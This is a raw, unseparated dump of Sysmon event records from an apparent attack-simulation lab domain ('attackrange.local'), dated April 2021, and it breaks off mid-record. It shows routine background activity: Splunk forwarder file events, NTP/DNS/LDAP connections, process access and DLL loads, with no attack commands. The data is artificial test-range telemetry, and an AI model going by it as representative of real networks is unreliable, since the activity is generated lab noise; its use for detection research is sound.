19:19:23.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095497Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:23.237{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC86D828BA7AD33B1FE109627A8813AA,SHA256=CDED20C189C9272C2E664D97E806DF1D838AAD2B748AA6B0DF945013E711AD8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001607070Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:21.687{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49745-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001607069Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.139{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001607068Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:23.139{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=637D5628B3703812710CD4EB4DF4DD1D,SHA256=638620C751E3E743FC656736A3356F75D76F456E35C918E796D57EC0EAE6D18Efalsefalse - insufficient disk space 11241100x80000000000000001607075Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:24.790{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607074Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:24.790{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=466DFF4BC54F1CFA5B5FD5DAF402CE17,SHA256=FB15CBFFF947DB64FEF06BAE42D2EE901936AEEAE0B49BA61CA361524555C819falsefalse - insufficient disk space 10341000x80000000000000001095503Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001095502Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095501Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.426{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B070326ADD2CA78D403F503FC413C79D,SHA256=7E31E672B8EDD45D157B2B894A81EDDECF53E577C476182B63A9D2B218EA420F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095500Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.242{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4809376698F0A10C4047C34955839D55,SHA256=19653D3DE85AF7C7251518A0635E1F7F47F95CDF7EAC436CF84F5C1B41F06154,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001607073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:24.188{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d736e3-0x3d22debf) 11241100x80000000000000001607081Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.827{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607080Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.826{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D509648F3F0955FD428C4CA7898A529F,SHA256=37A6C54EF1E213A1ABAF8D16FBF7A1A116C4185E60510821018CB82CF31CE6CDfalsefalse - insufficient disk space 23542300x80000000000000001095511Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:25.496{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B03B4E87493E10A322597A48B40FDA0,SHA256=9BD92E5D952A7A46EEBDFBF749E6C053E95ECE247B535628591B40398021F741,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095510Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:25.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095509Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:25.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001095508Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.043{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-62505-false127.0.0.1-53domain 354300x80000000000000001095507Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.043{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62505- 354300x80000000000000001095506Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:20.043{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:21fe:fdb:ffff-62505-true7f00:1:0:0:0:0:0:0-53domain 354300x80000000000000001095505Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.018{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local62505- 23542300x80000000000000001095504Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:25.247{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB60B2C95118BB76C74CFE165D7376A,SHA256=B0140A726D2D7379BA40D7E3F63EA31817CDEE12E43C66616FACD4B11B70FCAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001607079Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.722{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-5.attackrange.local123ntpfalse13.86.101.172-123ntp 354300x80000000000000001607078Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.722{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-5.attackrange.local123ntpfalse10.0.1.14-123ntp 11241100x80000000000000001607077Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.206{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 
23542300x80000000000000001607076Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.206{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95B589A522F6BE9F9367F3CEAA1F4DA4,SHA256=13D416E16D75C11584B9C3550DEB5384583BD8EB4C4153A73AC6B365D789FEB4falsefalse - insufficient disk space 11241100x80000000000000001607139Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.995{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607138Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.995{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931D4DEF4BCC1525E24021F2E518BF43,SHA256=74E969C783FF12C52EAB17FCFC95A13C45207EEA1A6EFBAC8896E32976575252falsefalse - insufficient disk space 23542300x80000000000000001095518Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:26.535{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7E812A474DE37896DE7BD277B2015FE,SHA256=FD5FE02F6CB8DFA54074F3B8B5D6FB48C6D818BE18795C733D5DBBD35554C2BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095517Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:26.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095516Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:26.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001095515Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.071{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1170-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001095514Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.071{761B69BB-819C-607D-2400-00000000BA01}2752C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1170-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 
354300x80000000000000001095513Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.775{761B69BB-818C-607D-1000-00000000BA01}100C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-982.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal123ntp 23542300x80000000000000001095512Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:26.254{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C2FB042923462773F646F956B74B01D,SHA256=830BDF82CA8D779D86E23849FEB75E537906565B63EDEC8DC76BAD9CA8FA1CB0,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001607137Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001607136Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001607135Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating 
SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001607134Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001607133Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001607132Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001607131Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001607130Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001607129Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001607128Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001607127Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 
734700x80000000000000001607126Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001607125Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001607124Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001607123Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 
Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001607122Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001607121Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001607120Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001607119Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program 
